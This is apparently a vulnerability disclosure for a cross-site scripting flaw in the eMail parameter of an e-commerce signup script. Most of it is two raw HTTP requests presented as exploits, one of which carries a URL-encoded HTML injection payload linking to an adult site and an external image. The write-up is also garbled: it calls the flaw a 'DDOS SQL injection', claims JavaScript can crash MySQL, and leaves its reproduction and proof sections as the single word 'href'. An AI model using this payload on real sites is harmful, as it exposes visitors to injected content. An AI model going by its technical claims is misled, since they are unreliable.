A cross-site scripting (XSS) vulnerability in the component /signup_script.php of Ecommerce-Website v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the eMail parameter.

**Description:**

The value of the eMail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick the users of this system, very easy to visit a very dangerous link from anywhere, and then the game will over for these customers. Also, the attacker can create a network from botnet computers by using this vulnerability.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Exploit00:

    POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.com HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
    Origin: http://pwnedhost.com
    Upgrade-Insecure-Requests: 1
    Referer: http://pwnedhost.com/ecommerce/index.php
    Content-Type: application/x-www-form-urlencoded
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 0
    

**Description01:**

JavaScript can be injected into the application response (a vulnerable app - signup\_script.php, no sanitizing submit function). The attacker can crash the MySQL server by sending large bites of POST requests to the MySQL server of this system.

**Real attack: JavaScript attack - type: DDOS SQL injection**

\[+\] Exploit01:

    POST /ecommerce/signup_script.php HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
    Origin: http://pwnedhost.com
    Upgrade-Insecure-Requests: 1
    Referer: http://pwnedhost.com/ecommerce/index.php
    Content-Type: application/x-www-form-urlencoded
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 1070
    
    eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ
    

**Reproduce:**

href

**Proof and Exploit:**

href

**Real Exploit:**

href

**Real Exploit - code insert:**

href

**Time spent**

1:45

Tag

#php